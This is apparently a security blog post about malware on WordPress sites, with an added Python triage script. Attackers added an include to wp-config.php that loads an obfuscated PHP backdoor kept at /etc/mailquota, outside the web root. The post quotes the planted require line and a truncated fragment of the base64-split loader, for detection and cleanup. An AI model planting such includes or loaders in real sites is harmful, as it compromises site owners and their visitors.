Malware on /etc/mailquota

We are seeing an interesting trend lately. A site gets compromised and starts to distribute malware to its users. The webmaster (owner of the site) searches everywhere for malicious strings, and can’t find anything. Where can it be hidden?

It could be outside the root directory of your site. On many sites we’ve been analyzing over the last few days, the attackers have been adding the following line to wp-config.php (yes, WordPress sites on shared hosts):

require( ABSPATH . "/../etc/mailquota");

Interesting, right? It is including mailquota, which is not a PHP file. When you look at the file, you get a long string of encoded PHP:

ncftp /etc > cat mailquota
<?$GLOBALS['_1562346450_']=Array(base64_decode('ZX' .'Jy' .'b3J' .'fc' .'mVwb3J0aW5' .'n'),base64_decode('cHJlZ19t' .'YXRj' .'aA' .'=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('c' .'HJlZ19tYX' .'Rja' .'A=='),base64_decode('Z2V0aG9z' .'dGJ5YWRk' .'cg==')); ..{$a=Array('QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=',

After being decoded, this does a bunch of nasty things (injects JavaScript malware, acts as a backdoor, etc.).

The lesson here? Never limit yourself to your web site root directory when searching for malicious strings. They can be anywhere (even hidden as Apache modules).
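As an added example (not code from this post, and not the malware's own logic), here is a small Python triage script that covers both points above: it resolves include/require targets against the web root to catch the "/../etc/mailquota" trick from wp-config.php, and it re-joins the split base64_decode() fragments from the quoted loader to show which PHP functions it resolves at run time. The web root /home/site/public_html is an assumed placeholder, and both sample inputs are constructed from the strings quoted in the post.

```python
"""Added example (not code from the Sucuri post): triage helpers for the
include-outside-webroot trick and the split-base64 loader shown above.
Both sample inputs are constructed from the strings quoted in the post."""
import base64
import posixpath
import re

# Constructed: a minimal wp-config.php with one legitimate and one planted include.
WP_CONFIG_SAMPLE = """<?php
define('DB_NAME', 'wordpress');
require_once( ABSPATH . 'wp-settings.php' );
require( ABSPATH . "/../etc/mailquota");
"""

# Constructed: the visible head of the dropped /etc/mailquota file, as quoted.
MAILQUOTA_SAMPLE = (
    "<?$GLOBALS['_1562346450_']=Array("
    "base64_decode('ZX' .'Jy' .'b3J' .'fc' .'mVwb3J0aW5' .'n'),"
    "base64_decode('cHJlZ19t' .'YXRj' .'aA' .'=='),"
    "base64_decode('cHJlZ19t' .'YXRja' .'A=='),"
    "base64_decode('c' .'HJlZ19tYX' .'Rja' .'A=='),"
    "base64_decode('Z2V0aG9z' .'dGJ5YWRk' .'cg=='));"
    "$a=Array('QF45N1wuMTA3XC4xMzV8MTczXC4yMzBcLjEyOHw2NlwuMjI4XC4zNEA=');"
)

# include/require with a literal path, optionally prefixed by ABSPATH (assumed,
# as in WordPress, to be the web root with a trailing slash).
INCLUDE_RE = re.compile(
    r"\b(?P<kw>(?:require|include)(?:_once)?)\s*\(?\s*"
    r"(?P<abspath>ABSPATH\s*\.\s*)?(?P<q>['\"])(?P<path>[^'\"]+)(?P=q)"
)
# base64_decode( 'frag' .'frag' ... ) with the argument chopped into pieces.
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*((?:['\"][A-Za-z0-9+/=]*['\"]\s*\.?\s*)+)\)")
FRAGMENT_RE = re.compile(r"['\"]([A-Za-z0-9+/=]*)['\"]")
LONG_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")


def find_suspicious_includes(php_source, webroot):
    """Return (statement, resolved_path, reasons) for every include/require whose
    target resolves outside `webroot` or is not a .php file."""
    webroot = webroot.rstrip("/")
    findings = []
    for m in INCLUDE_RE.finditer(php_source):
        literal = m.group("path")
        # ABSPATH-relative and plain relative paths hang off the web root;
        # a bare absolute literal is taken as-is.
        base = "/" if (m.group("abspath") is None and literal.startswith("/")) else webroot
        resolved = posixpath.normpath(posixpath.join(base, literal.lstrip("/")))
        reasons = []
        if not (resolved == webroot or resolved.startswith(webroot + "/")):
            reasons.append("resolves outside web root")
        if not resolved.endswith(".php"):
            reasons.append("target is not a .php file")
        if reasons:
            findings.append((m.group(0), resolved, reasons))
    return findings


def decode_base64_calls(php_source):
    """Re-join split base64_decode() arguments and decode them, exposing the
    function names the loader looks up at run time."""
    decoded = []
    for m in B64_CALL_RE.finditer(php_source):
        joined = "".join(FRAGMENT_RE.findall(m.group(1)))
        try:
            decoded.append(base64.b64decode(joined, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<undecodable:%s>" % joined)
    return decoded


def decode_long_literals(php_source):
    """Decode any long base64-looking literal that yields printable text, so the
    loader's other configuration (the $a array above) is not missed."""
    out = []
    for m in LONG_LITERAL_RE.finditer(php_source):
        raw = m.group(1)
        if len(raw) % 4:
            continue
        try:
            text = base64.b64decode(raw, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append((raw, text))
    return out


def obfuscation_indicators(php_source):
    """Cheap counts that separate this loader style from ordinary PHP."""
    return {
        "base64_decode_calls": len(B64_CALL_RE.findall(php_source)),
        "string_splices": len(re.findall(r"['\"]\s*\.\s*['\"]", php_source)),
        "globals_indirection": len(re.findall(r"\$GLOBALS\[\s*['\"]_?\d+_?['\"]\s*\]", php_source)),
    }


if __name__ == "__main__":
    for stmt, path, why in find_suspicious_includes(WP_CONFIG_SAMPLE, "/home/site/public_html"):
        print("SUSPICIOUS: %s -> %s (%s)" % (stmt, path, "; ".join(why)))
    print("resolved functions:", decode_base64_calls(MAILQUOTA_SAMPLE))
    print("decoded literals:", decode_long_literals(MAILQUOTA_SAMPLE))
    print("indicators:", obfuscation_indicators(MAILQUOTA_SAMPLE))
```

Running it flags the single include that lands in /home/site/etc/mailquota (outside the web root and not a .php file) and resolves the five base64 arguments to error_reporting, preg_match (three times) and gethostbyaddr. The long literal in $a decodes to a PCRE pattern of three dotted IPv4 prefixes wrapped in @ delimiters, which is why a second pass over long literals, not only base64_decode() arguments, is worth the few extra lines when triaging a dropped file like this one.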

Web site hacked? You think it is? Scan it here to double check: http://sitecheck.sucuri.net.